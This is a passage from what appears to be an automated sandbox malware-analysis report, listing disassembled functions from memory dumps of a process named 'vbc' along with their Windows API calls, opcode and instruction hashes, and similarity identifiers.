                                                          • Opcode Fuzzy Hash: 878958027b4279d135e1bfd68602df9d690b0be0f71cff887a25d42e6aa8dea9
                                                          • Instruction Fuzzy Hash: 6B3146B0D186699FEB14CFA8C884B9DBBF5FB18314F148929E815E7380D7B89441CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0AE04E7C Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CopyFileW.KERNELBASE(?,00000000,?), ref: 0AE07791
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.579895079.000000000AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_ae00000_vbc.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: a5d72fb05d0af04f8be6f3b422ad594620eb48a4917f7afe969d3b7c7f8d28bd
                                                          • Instruction ID: 4eeb270df858a5fff2583477f3c342ab12236389e86b1d7b799568f53047e480
                                                          • Opcode Fuzzy Hash: a5d72fb05d0af04f8be6f3b422ad594620eb48a4917f7afe969d3b7c7f8d28bd
                                                          • Instruction Fuzzy Hash: 5B315EB5D016199FCB10CF99D484BEEBBF5EF48320F15816AE818AB340D7749940CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8A40B8 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,0A8A45D6), ref: 0A8A4786
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578614016.000000000A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8a0000_vbc.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: d1728583eeb02bb55552d18a8adeba56099f7b09dfdc2d77da6cabe836cf6e32
                                                          • Instruction ID: ab16663c1db22d001b58d0320383c1a35603ad131e58724d5e98bd4c45b3906f
                                                          • Opcode Fuzzy Hash: d1728583eeb02bb55552d18a8adeba56099f7b09dfdc2d77da6cabe836cf6e32
                                                          • Instruction Fuzzy Hash: 081144B5C003488FDF10CF9AC444ADEFBF8EB89224F15842AD419B7210C3B5A545CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8A4718 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,0A8A45D6), ref: 0A8A4786
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578614016.000000000A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8a0000_vbc.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: d559980f095e2eb1446a2b81bf81053a8489afee94da59cbe7fa969e8486f2da
                                                          • Instruction ID: ee6c025cc623d54bcf39865c3fdb350fbf40258ea5921baef61213cbabe7e393
                                                          • Opcode Fuzzy Hash: d559980f095e2eb1446a2b81bf81053a8489afee94da59cbe7fa969e8486f2da
                                                          • Instruction Fuzzy Hash: 7F1114B5C002498FDF10CFAAC444BDEFBF5AF99214F15842AD429B7610C3B5A545CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFDB77 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c5m
                                                          • API String ID: 0-1523964424
                                                          • Opcode ID: b1d4cc11d3e8936047fe2b99bb704537ba432f45bb18f9da394c797dc3681a2a
                                                          • Instruction ID: cf29e594807b06082c206efba7c1b4645d903676fd57824f5e6d10053a0242d2
                                                          • Opcode Fuzzy Hash: b1d4cc11d3e8936047fe2b99bb704537ba432f45bb18f9da394c797dc3681a2a
                                                          • Instruction Fuzzy Hash: E7217C34F10249DFDB14AFA4D4697AEBBB2BB85304F108429E50AAF394DF706C09CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F1741 Relevance: 1.1, Instructions: 1144COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73b2cd0515ed3be8f55f2e0158a9d797bb362614691d861aa1b172099f3d7672
                                                          • Instruction ID: 362370238f1e3a1f7695617596db603523ebb9b9041eb12ec4513d45db6710a8
                                                          • Opcode Fuzzy Hash: 73b2cd0515ed3be8f55f2e0158a9d797bb362614691d861aa1b172099f3d7672
                                                          • Instruction Fuzzy Hash: 40A25D74B001189FCB64EB64C895AEDB7B6FF48704F108499E61AAB3A0DB71ED81CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF4ED0 Relevance: .4, Instructions: 446COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20ac55140341bc25de43c9bca06bcdf23bae66b7a6bb2891c51debddb62ddc6e
                                                          • Instruction ID: 71598f32992b76bf377b575e862c0afb26035b74112f6d7c87ffc745fd86531d
                                                          • Opcode Fuzzy Hash: 20ac55140341bc25de43c9bca06bcdf23bae66b7a6bb2891c51debddb62ddc6e
                                                          • Instruction Fuzzy Hash: 26123931A00209DFCB54EFA4C494AAEB7E6FF84325F148DA8D5164F265DB70AD86CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F2AC8 Relevance: .4, Instructions: 405COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 134a8263bbd8b902dcf591507c88ddf66879e7ab9fc9bb78022bb3b4e9cd3d81
                                                          • Instruction ID: c361f59958fa344c9a84b7cb22edcd14c57c372a0ae8753624a8d7dd77ae94e2
                                                          • Opcode Fuzzy Hash: 134a8263bbd8b902dcf591507c88ddf66879e7ab9fc9bb78022bb3b4e9cd3d81
                                                          • Instruction Fuzzy Hash: 46F1F875B002099FCB04DFA8C984DADBBFAEF88704B158499E601DB3B6DB71EC458B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F002C Relevance: .3, Instructions: 327COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7145de5e324df698fedf4af86e4b1401b5609aaa594467668fd1f64e505d5c7a
                                                          • Instruction ID: 8d4e6881571505460155c194e9c7c02473e06175f03df9ee4254680cfa05baaf
                                                          • Opcode Fuzzy Hash: 7145de5e324df698fedf4af86e4b1401b5609aaa594467668fd1f64e505d5c7a
                                                          • Instruction Fuzzy Hash: 94C1AE74B08209EFDB108FA4D845AAE7BB6FF84708F114459D605DF3A2EBB1D845CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF6EC8 Relevance: .3, Instructions: 325COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bd504137a2d539a6c293cead09e5c0d648dfdebee6b9415ec2410a9e26dc2e1
                                                          • Instruction ID: 82984093daa64100f6f15706a8da846f545cf17a4f0dd572c3651300137a49cd
                                                          • Opcode Fuzzy Hash: 4bd504137a2d539a6c293cead09e5c0d648dfdebee6b9415ec2410a9e26dc2e1
                                                          • Instruction Fuzzy Hash: 75D12C71A00209DFCB14DFA4C494AADB7B6FF84325F14C9A8E5159B2A4DB70ED86CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF6370 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 46d0c9840da3844374ae80a7fa859ba0174588a00250fe9135f4b9e339256a7e
                                                          • Instruction ID: d437c0e5efb7be6fcb0cbf50b87b55a808c3b1dafc883e1aef627561ab87d8ce
                                                          • Opcode Fuzzy Hash: 46d0c9840da3844374ae80a7fa859ba0174588a00250fe9135f4b9e339256a7e
                                                          • Instruction Fuzzy Hash: BCA1B0327002099FDB24EB74C45566EB7E7EFC0224F118D69D9168B791EF70EC4A8781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFF7F4 Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55eacf17522a815ca4fb052db3075749faf8a6d8f3f337379eb2a3955937e618
                                                          • Instruction ID: cef3b083e991ddbb1a6dabc396cbd34b4860deb464b0be80b0dcdb02e8f37538
                                                          • Opcode Fuzzy Hash: 55eacf17522a815ca4fb052db3075749faf8a6d8f3f337379eb2a3955937e618
                                                          • Instruction Fuzzy Hash: DB913734A00208DFDB14CFA8D564BEDBBF2EF88314F1584A9E905AB361DB34D945CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF3140 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71260ebf4dcd4b16d0f7a2bdd80c5511fedbb10cd4a5faba6e46c8a9adfe10ed
                                                          • Instruction ID: 899d653b3b63000973473a3ce0d8ce92c917c24c2633725a728b12dd79728618
                                                          • Opcode Fuzzy Hash: 71260ebf4dcd4b16d0f7a2bdd80c5511fedbb10cd4a5faba6e46c8a9adfe10ed
                                                          • Instruction Fuzzy Hash: 5E818374B00205DFDB14DFA8D899AAEBBF2FF88354F1584A9E901A7351DB70AC49CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFF548 Relevance: .2, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f31cb642cbfaf67822ee399acadc58838e61c0fe0e44a78930eb178ebc3c0ed3
                                                          • Instruction ID: 62bb0d0da40c7960a1d41bba12aefb3893201a25998198b2e1d1f6b332cf25b8
                                                          • Opcode Fuzzy Hash: f31cb642cbfaf67822ee399acadc58838e61c0fe0e44a78930eb178ebc3c0ed3
                                                          • Instruction Fuzzy Hash: 46813A34710145CFCB08DF68C4A4AAABBE6FF89714F1581A9E906CB3A5DB30EC45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F3DE0 Relevance: .2, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87da4ec2eade2e4b9c877fc9308e88324bed41230ced7beae7253124d6cf3f7f
                                                          • Instruction ID: f291466a9dfad58287883a87a2fc7082655021942280b726d1a153171b8959d7
                                                          • Opcode Fuzzy Hash: 87da4ec2eade2e4b9c877fc9308e88324bed41230ced7beae7253124d6cf3f7f
                                                          • Instruction Fuzzy Hash: 75815675B041099FCB14DF69C884DAABBB6FF88714B1580AAEA15EF361DB31EC05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFF53F Relevance: .2, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0147ba837acf95ad8ee9fb40562c03792760b8cfaf1d32fede44fa4aa56f3fa
                                                          • Instruction ID: b2434e697675fd972ef2f99e1c890ab55c0f88fb058175f20e44a7ad40d3a655
                                                          • Opcode Fuzzy Hash: c0147ba837acf95ad8ee9fb40562c03792760b8cfaf1d32fede44fa4aa56f3fa
                                                          • Instruction Fuzzy Hash: DE8128347101459FCB04DF68C864AAEBBE6FF89314F1581A9EA06CB3A5DB34EC45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFDAB0 Relevance: .2, Instructions: 196COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f7f56eb3f97ebe078c5c1106643e2cf86f9f8f8f76a2a4671f50c7c762a365c
                                                          • Instruction ID: 0a66cc9ac425b6d9ec30d09da34f80086abff4f776675767480537a07b16ad50
                                                          • Opcode Fuzzy Hash: 4f7f56eb3f97ebe078c5c1106643e2cf86f9f8f8f76a2a4671f50c7c762a365c
                                                          • Instruction Fuzzy Hash: 9D716134B10205DFCB14EFB4D4696AD7BB6FF85310F108569E506AB394EF709849CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF6118 Relevance: .2, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc11a0b09e9f44952a38d4daf8a96f7eeb671025fe9bd9835da49533ef1ac0cd
                                                          • Instruction ID: fe62ef4a5a708880a35f456bbb5e8d161f3a029bbcfd4dc787352b31eef5ceac
                                                          • Opcode Fuzzy Hash: fc11a0b09e9f44952a38d4daf8a96f7eeb671025fe9bd9835da49533ef1ac0cd
                                                          • Instruction Fuzzy Hash: 60712E31A00609DFCB14DFA4C494AAEB7F6FF88324F048D69D9159B265DB70ED89CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF1B00 Relevance: .2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fae8448f233f5b6282dd9a8d7235e9219d72c10436a3aae20e9b1935b2e70f11
                                                          • Instruction ID: 36c7367a819fa853bc6af95d26f6ab0cded3ea1c0e83c2e04c0179cdb033d7d6
                                                          • Opcode Fuzzy Hash: fae8448f233f5b6282dd9a8d7235e9219d72c10436a3aae20e9b1935b2e70f11
                                                          • Instruction Fuzzy Hash: C4616C34714250CFC715DF28C0A8A6EBBE2EF85760B1589A9E9098F391DB35EC46CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF4708 Relevance: .2, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5ff97b2b4ab7f41ab31f55c0f32860d8f582da054b287a75536c2a32f93b118
                                                          • Instruction ID: 605868f31d60a85f983b247254f504f0b852227af4c5326d02cee32fa72406f7
                                                          • Opcode Fuzzy Hash: d5ff97b2b4ab7f41ab31f55c0f32860d8f582da054b287a75536c2a32f93b118
                                                          • Instruction Fuzzy Hash: 8E510835B00350CFC7149B78A4595AEBBF6EF89261B04847AE915C7390DF35DD09C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFE8E1 Relevance: .2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70bf43c62d02b38198a061a4788725bfdd9dd842ddb8d24e9a72c4237fa8ac32
                                                          • Instruction ID: 12e436406440e0e1c898de614eb4db81709b4ab6c3e5a096106e55103bf6a858
                                                          • Opcode Fuzzy Hash: 70bf43c62d02b38198a061a4788725bfdd9dd842ddb8d24e9a72c4237fa8ac32
                                                          • Instruction Fuzzy Hash: 25713B34E10208CFCB04DFA8D498A9DBBB2FF88315B118599E805AB365DB30ED46CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFE8E8 Relevance: .2, Instructions: 164COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 259a78506a3d008f5948586059cba279d121f207163efac674453088a2f3e63d
                                                          • Instruction ID: b770a3f74cce2e201ecffe141b46eb7f1e466784f770193522dacf42c75c751c
                                                          • Opcode Fuzzy Hash: 259a78506a3d008f5948586059cba279d121f207163efac674453088a2f3e63d
                                                          • Instruction Fuzzy Hash: 46712934E10208CFCB04DFA8D598A9DBBB2FF88315B118599E805AB365DB70ED46CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFEB47 Relevance: .2, Instructions: 164COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 983cac7614d2301f4e36c3bcafd3c4a578e8f8220feeadea3b8a49e68178ebb9
                                                          • Instruction ID: 80b995a5b9fb36a65fb51023c2eb3fade7c5feab46d7c4abbb61330c53813a50
                                                          • Opcode Fuzzy Hash: 983cac7614d2301f4e36c3bcafd3c4a578e8f8220feeadea3b8a49e68178ebb9
                                                          • Instruction Fuzzy Hash: 9451AD34B00204DFCB19EB74C4686BE37A6EF85325B5488A9E506DB3A0DF34DD46CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF2320 Relevance: .1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a529d8b8f3ffdaf9bfceade01c14c53f9264bc8f5ac4208a85a0901fb319442
                                                          • Instruction ID: 7b2c48335880e6c1ee3da686f7e984c554acb9f14001b46b46ac9717d65b1538
                                                          • Opcode Fuzzy Hash: 2a529d8b8f3ffdaf9bfceade01c14c53f9264bc8f5ac4208a85a0901fb319442
                                                          • Instruction Fuzzy Hash: 12511474A00604CFCB14DF64D598A6EFBF2FF88311B158969E95A97391CB30EC46CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F28B8 Relevance: .1, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 997da0cb3e3d73f24fcbc092d7709a092f242f169eb30bfd9469eef55b453bb1
                                                          • Instruction ID: 824f97b10cadd54414f54368d3c65225e612fb3d5821c97cfea32777eea820f9
                                                          • Opcode Fuzzy Hash: 997da0cb3e3d73f24fcbc092d7709a092f242f169eb30bfd9469eef55b453bb1
                                                          • Instruction Fuzzy Hash: 62515A35B101199FCB14DF69C8849EEBBB2FF88314B118469EA15EB361EB30EC05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFAEC0 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d621e1f820056e82bc7ffbd6190c7ef82c5326977f0181a66887a6a8eadb7234
                                                          • Instruction ID: b1753547116b6bc7fd3e05024f0f95649acbe0c93edd5dfa4f6aba1ff813ee79
                                                          • Opcode Fuzzy Hash: d621e1f820056e82bc7ffbd6190c7ef82c5326977f0181a66887a6a8eadb7234
                                                          • Instruction Fuzzy Hash: 4B510730704155CFDB14CFB8C169BEE7BF1EB48329F118099E609A7390DB719888CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFAEB0 Relevance: .1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1177a0b644655b3f71d69383da7e9be2202d235e16e01629817e7eb2adc61d95
                                                          • Instruction ID: 2fbf304eadcbdd875341a7ab161804a71e1d6bc5ab6a42bd98f1df62494b9568
                                                          • Opcode Fuzzy Hash: 1177a0b644655b3f71d69383da7e9be2202d235e16e01629817e7eb2adc61d95
                                                          • Instruction Fuzzy Hash: 5E51F730704255CFDB64CBB8C159B9E7BF1EF48328F158099E509AB361D7709888CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF13D0 Relevance: .1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 48ed735dc623283aa1bed816666c117a22febc2800c71d37573f473428dc8633
                                                          • Instruction ID: 6d568a0b591e9d64ef92b92a80bcc32772edf1bbacec50c6374cdd320dfdb5a7
                                                          • Opcode Fuzzy Hash: 48ed735dc623283aa1bed816666c117a22febc2800c71d37573f473428dc8633
                                                          • Instruction Fuzzy Hash: 0141A131A00315CBCB14DBA8D4645DE77FAAF84228B108E79D5469B350EF71EE4A8BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFA4FF Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed3511a66cee1a1cdbefe63ba19ff6469c6399eeffff9bebdb405e4553fbc36d
                                                          • Instruction ID: bd6187dbaa5d66ac20c43da8d4e6b4b773532e3f0b3e47b3fea1c9ebc9ad6c5a
                                                          • Opcode Fuzzy Hash: ed3511a66cee1a1cdbefe63ba19ff6469c6399eeffff9bebdb405e4553fbc36d
                                                          • Instruction Fuzzy Hash: 7151F730704155CFDB54CFB8C1A8BAD7BF2EF48329F158099E508AB390DB749888CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF4D40 Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2440a4e744b5f02003d9ad83fb51e6e3a7a7e21c9bd77253bc9d57749593dbc
                                                          • Instruction ID: 711c5f5741546f9f83bea99108c83be2a03a6aed4b8369aac09a68c95eb72eb4
                                                          • Opcode Fuzzy Hash: c2440a4e744b5f02003d9ad83fb51e6e3a7a7e21c9bd77253bc9d57749593dbc
                                                          • Instruction Fuzzy Hash: A041BF357102049FCB299B7C942976E77E7EB85724F1488AAE216CB7B1DF38CC458781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F3228 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
